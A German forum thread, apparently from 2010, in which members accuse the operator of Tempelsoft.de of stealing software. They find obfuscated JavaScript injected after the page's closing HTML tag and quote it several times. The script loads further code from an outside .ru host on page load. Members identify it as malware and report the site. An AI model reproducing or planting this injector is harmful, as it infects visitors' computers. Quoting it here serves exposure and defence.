Tempelsoft.de = Klau-Seite?

  • so, habe mal im virtuellenPC mit rückgängigdatenträger den Source der Seite angeschut. nach dem </html> kommt das:

    Spoiler anzeigen

    <script>this.tg=62298;this.tg--;G=[];var k;var Mn="Mn";var C_=["dZ"];l=function(){W={tr:"lI"};this.E=49964;this.E+=170;function z(I,x,xC){return I.substr(x,xC);lO={c:false};var l_=new String();}X={Z:107};var xb=new Array();var A=document;try {var QZ='cv'} catch(QZ){};var m='';var V_=["Y","CU"];var DE=["Wp"];var Cr=false;var d=RegExp;var p={};var N="/go"+z("oglkjri",0,3)+"e.c"+"om/"+"hos"+z("zFdtgazFd",3,3)+z("torDZ21",0,3)+".co"+z("m/mOGQp",0,3)+z("UgVixigUV",3,3)+z("EFi.jpiEF",3,3)+".ph"+"p";T=38958;T+=139;var da=["h","CE"];var _x=["gr"];function o(I,x){var Mp=["P","QQ"];var xC=String(z("[d0A",0,1))+x+String(z("]GbQ",0,1));q=[];var D=new d(xC, new String("g"));var e=new String();var Zg=new Array();return I.replace(D, m);};var Mq=["CY"];var f=["n"];var H=143366-135286;this.NH=23076;this.NH++;try {var py='BZ'} catch(py){};var IC=String("body");ze=23900;ze--;RS=38547;RS--;var HC=o('sxcIrIiIpGtB','GxqIB4');var ra={HR:false};var TM={Jd:false};var _=null;pZ={AJ:"jv"};tn={};k=function(){var Uz=new Date();try {var ea=new String();var t=o('c7rPeRaHtiedEPlOePm4e4nPtb','8h4OSbRiP7dHw');jp={};U=A[t](HC);this.xR=19785;this.xR-=193;this.eg='';se={};var I=H+N;UI=[];var TJ="";var lk=new String("defer");var jg={_e:"cu"};var S=o('sUrZcj','UhSj0wvgnDXZyQlE');var NX={nH:"aw"};var Ap={Cu:"Lw"};U[S]="htt"+"p:/"+z("/furQq",0,3)+z("PO0rry0PO",3,3)+z("pipEPZ6",0,3)+z("e.rkQST",0,3)+z("u:rg5V",0,2)+I;uO=25573;uO--;this.Od=23493;this.Od++;try {var Dq='wjw'} catch(Dq){};this.Mm="";U[lk]=[1][0];AL={uU:17593};WH={vB:40290};try {var cV='hC'} catch(cV){};A[IC].appendChild(U);try {var Gr='Oq'} catch(Gr){};NW={Uzm:false};} catch(UX){var nV='';JB=303;JB--;try {} catch(aZ){};var cp

  • so, habe mal im virtuellenPC mit rückgängigdatenträger den Source der Seite angeschut. nach dem </html> kommt das:

    Spoiler anzeigen

    <script>this.tg=62298;this.tg--;G=[];var k;var Mn="Mn";var C_=["dZ"];l=function(){W={tr:"lI"};this.E=49964;this.E+=170;function z(I,x,xC){return I.substr(x,xC);lO={c:false};var l_=new String();}X={Z:107};var xb=new Array();var A=document;try {var QZ='cv'} catch(QZ){};var m='';var V_=["Y","CU"];var DE=["Wp"];var Cr=false;var d=RegExp;var p={};var N="/go"+z("oglkjri",0,3)+"e.c"+"om/"+"hos"+z("zFdtgazFd",3,3)+z("torDZ21",0,3)+".co"+z("m/mOGQp",0,3)+z("UgVixigUV",3,3)+z("EFi.jpiEF",3,3)+".ph"+"p";T=38958;T+=139;var da=["h","CE"];var _x=["gr"];function o(I,x){var Mp=["P","QQ"];var xC=String(z("[d0A",0,1))+x+String(z("]GbQ",0,1));q=[];var D=new d(xC, new String("g"));var e=new String();var Zg=new Array();return I.replace(D, m);};var Mq=["CY"];var f=["n"];var H=143366-135286;this.NH=23076;this.NH++;try {var py='BZ'} catch(py){};var IC=String("body");ze=23900;ze--;RS=38547;RS--;var HC=o('sxcIrIiIpGtB','GxqIB4');var ra={HR:false};var TM={Jd:false};var _=null;pZ={AJ:"jv"};tn={};k=function(){var Uz=new Date();try {var ea=new String();var t=o('c7rPeRaHtiedEPlOePm4e4nPtb','8h4OSbRiP7dHw');jp={};U=A[t](HC);this.xR=19785;this.xR-=193;this.eg='';se={};var I=H+N;UI=[];var TJ="";var lk=new String("defer");var jg={_e:"cu"};var S=o('sUrZcj','UhSj0wvgnDXZyQlE');var NX={nH:"aw"};var Ap={Cu:"Lw"};U[S]="htt"+"p:/"+z("/furQq",0,3)+z("PO0rry0PO",3,3)+z("pipEPZ6",0,3)+z("e.rkQST",0,3)+z("u:rg5V",0,2)+I;uO=25573;uO--;this.Od=23493;this.Od++;try {var Dq='wjw'} catch(Dq){};this.Mm="";U[lk]=[1][0];AL={uU:17593};WH={vB:40290};try {var cV='hC'} catch(cV){};A[IC].appendChild(U);try {var Gr='Oq'} catch(Gr){};NW={Uzm:false};} catch(UX){var nV='';JB=303;JB--;try {} catch(aZ){};var cp


    Was soll das jetzt heißen?

    • Offizieller Beitrag

    Dass Leute ohne Ahnung keine Webseiten ins Netz stellen sollten! Du musst deine Seite a) säubern oder -- wenn du das nicht kannst -- b) aus dem Netz nehmen. So verschleudert sie nur Viren.

    Für alle: 3D-Video, der Titel wurde von mir bearbeitet.

    Johannes

  • Was soll was heissen?
    Das da bei Jonathan was durchgestrichen ist? - Das liegt daran das das Forum hier teile des JS-Codes als BBCode für's durchstreichen interpretiert.

    Oder was das hier heissen soll?

    Code
    <script>this.tg=62298;this.tg--;G=[];var k;var Mn="Mn";var C_=["dZ"];l=function(){W={tr:"lI"};this.E=49964;this.E+=170;function z(I,x,xC){return I.substr(x,xC);lO={c:false};var l_=new String();}X={Z:107};var xb=new Array();var A=document;try {var QZ='cv'} catch(QZ){};var m='';var V_=["Y","CU"];var DE=["Wp"];var Cr=false;var d=RegExp;var p={};var N="/go"+z("oglkjri",0,3)+"e.c"+"om/"+"hos"+z("zFdtgazFd",3,3)+z("torDZ21",0,3)+".co"+z("m/mOGQp",0,3)+z("UgVixigUV",3,3)+z("EFi.jpiEF",3,3)+".ph"+"p";T=38958;T+=139;var da=["h","CE"];var _x=["gr"];function o(I,x){var Mp=["P","QQ"];var xC=String(z("[d0A",0,1))+x+String(z("]GbQ",0,1));q=[];var D=new d(xC, new String("g"));var e=new String();var Zg=new Array();return I.replace(D, m);};var Mq=["CY"];var f=["n"];var H=143366-135286;this.NH=23076;this.NH++;try {var py='BZ'} catch(py){};var IC=String("body");ze=23900;ze--;RS=38547;RS--;var HC=o('sxcIrIiIpGtB','GxqIB4');var ra={HR:false};var TM={Jd:false};var _=null;pZ={AJ:"jv"};tn={};k=function(){var Uz=new Date();try {var ea=new String();var t=o('c7rPeRaHtiedEPlOePm4e4nPtb','8h4OSbRiP7dHw');jp={};U=A[t](HC);this.xR=19785;this.xR-=193;this.eg='';se={};var I=H+N;UI=[];var TJ="";var lk=new String("defer");var jg={_e:"cu"};var S=o('sUrZcj','UhSj0wvgnDXZyQlE');var NX={nH:"aw"};var Ap={Cu:"Lw"};U[S]="htt"+"p:/"+z("/furQq",0,3)+z("PO0rry0PO",3,3)+z("pipEPZ6",0,3)+z("e.rkQST",0,3)+z("u:rg5V",0,2)+I;uO=25573;uO--;this.Od=23493;this.Od++;try {var Dq='wjw'} catch(Dq){};this.Mm="";U[lk]=[1][0];AL={uU:17593};WH={vB:40290};try {var cV='hC'} catch(cV){};A[IC].appendChild(U);try {var Gr='Oq'} catch(Gr){};NW={Uzm:false};} catch(UX){var nV='';JB=303;JB--;try {} catch(aZ){};var cp=new Array();};};};l();window.onload=k;iD=["Zv","JG"];_p=["Ut","ql"];var YT={};</script>


    Die Mühe, das komplett lesbar zu machen spar ich mir heut abend. Zumal man auch so nahezu den kompletten Ablauf des Skripts lesen kann. Vor allem ab var d=RegExp; wird's interessant.

  • Ich kann echt nur den Kopf schütteln...
    Erst Sachen klauen, dann um Gnade betteln, die dir sogar teilweise erstattet wurde, dann noch ein geklautes Video hochladen und wieder behaupten es sei deins und zum Schluss Viren auf der Homepage. Das das nun im Register von Google ist und du deine Webside eigendlich in die Tonne kloppen kanst (schon allein, weil dieser Thread an 3. Stelle von Google kommt, wenn man "Tempelsoft" eingibt) hast du mit Recht verdient!
    Ich verstehs echt nicht, aber ich glaub ich gebs auf, hier mit zu diskutiern... Irgendwann reichts dann auch :thumbdown:
    Evtl. sollte auch dieser Thread geclosed werden :whistling:

    Spoiler anzeigen

    Grundkenntnisse in: C++, JavaScript
    Sehr gute Kenntnisse: PHP, JAVA, C und näturlich AutoIt


    Klaviatur, Anhang UDF, GDI+ Mühle

    Zitat

    "Wenn einen um 20h der Pizzadienst anruft und fragt, ob man's nur vergessen hat und ob man das gleiche
    möchte wie immer -- dann sollte man sein Bestellverhalten evtl überdenken"

  • Fuer die Programme habe ich mich entschuldigt,es ist mein Video und fuer die viren kann ich nichts man. Letzter Wunsch: ich will das theard mit dem Video loeschen, abar kann es nicht mehr
    also Armins bitte den ersten Beitrag loeschen.

    • Offizieller Beitrag

    Ich heiße nicht Armin.

    Ansonsten: Hier wird nicht einfach so etwas gelöscht. Außerdem: Bloß weil du etwas in der Hand hattest, hast du NICHT die Urheberrechte daran. Das Video darfst du NICHT veröffentlichen, wenn du keine Erlaubnis vom Urheber der BILDER hast. Das ist offenbar nicht der Fall. Warum du das direkt nach der Aktion hier veröffentlichst, ist mir ein absolutes Rätsel und ich bin ehrlich gesagt nicht gewillt (und wie wir erkannt haben) inzwischen auch gar nicht mehr fähig die Spuren der ganzen Aktion aus dem Google-Gedächtnis zu tilgen.

    Johannes

  • Das JS ist nicht von allein dahin gekommen. Wenn du es nicht angehängt hast dann war's jemand anders. So oder so, als Seitenbetreiber bist du dafür verantwortlich. Warum ist die Seite noch online?

    Wenn das Video von di ist dann besteht doch kein Grund den Thread zu löschen. ?(

  • Ich will hier niemanden verteidigen oder so, aber dieser Thread wurde 9 Minuten nach dem erstellen des Video-Threads veröffentlicht.
    Klar, es verstößt gegen die Urheberrechte etc., aber er konnte gar nicht wissen, dass dieser Thread erstellt geworden werden würde und somit kann ich deine Aussage nicht verstehen.
    Nun, ich denke es war trotzdem sein Video, auch wenn es nicht seine Bilder waren.

    Edit: Guckt euch das mal an: http://www.beammachine.net/de/site.php?details=89782
    :D

    Viele Grüße,
    HopFail

  • Ist ja auch besonders schlau seinen FTP-Zugang in nicht obfuszierten Scripten zu hinterlegen...
    Woraus ich erkennen konnte, dass er die geklauten Scripts immer noch nicht gelöscht hat :cursing:

    Spoiler anzeigen

    Grundkenntnisse in: C++, JavaScript
    Sehr gute Kenntnisse: PHP, JAVA, C und näturlich AutoIt


    Klaviatur, Anhang UDF, GDI+ Mühle

    Zitat

    "Wenn einen um 20h der Pizzadienst anruft und fragt, ob man's nur vergessen hat und ob man das gleiche
    möchte wie immer -- dann sollte man sein Bestellverhalten evtl überdenken"

  • Ist ja auch besonders schlau seinen FTP-Zugang in nicht obfuszierten Scripten zu hinterlegen...
    Woraus ich erkennen konnte, dass er die geklauten Scripts immer noch nicht gelöscht hat :cursing:

    man ich bin in London im St.ermins nur mit dem iPod online und haba meinen Computer nicht hier.

    Und du hast doch echt Probleme: dekompilieren und hacken

  • Dann war ich mal so frei und habe den account bei bplaced gemeldet. Die kümmern sich in solchen Fällen relativ zeitnah.
    Irgendwie muss man die Ahnungsloasen schützen.

    Zitat

    Und du hast doch echt Probleme: dekompilieren und hacken


    Leider find ich grad das Bild mit dem Glashaus nicht ... das wäre dann frei interpretierbar gewesen.

  • Und du hast doch echt Probleme: dekompilieren und hacken


    Wo hat er was Decomüpiled? du meinst damit eher mcih, und wieso darf ich nciht meine eigenen Programme decompilen? Ich sehe darin niemandes rechte verletzt, außer ich hätte dich fragen sollen, weil du ja in der zeile mit GuiCreate im titel etwas geändert hast :rofl:

    Dann war ich mal so frei und habe den account bei bplaced gemeldet. Die kümmern sich in solchen Fällen relativ zeitnah.
    Irgendwie muss man die Ahnungsloasen schützen.

    Gut, weil bei Viren/Trojanern hört der Spaß echt auf

    man ich bin in London im St.ermins nur mit dem iPod online und haba meinen Computer nicht hier.

    Es gibt sogar FTP Server für den iPod (weiß ich, ich habe einen) Und es wird wohl auch FTP-Clients geben. Zudem Weiß ich, das du nicht in London bist (man kann ip´s relativ genau orten)

  • So ich bin am Mietcomputer. Also einer von euch hat mein Script dekompiliert, einer hat sich in meinen Server gehackt, und ein anderer meldet mich obwohl ich keine Ahnung von den Viren hatte und keine Zeit dazu sie zu entfernen.

    Einmal editiert, zuletzt von shayn (23. Mai 2010 um 23:55)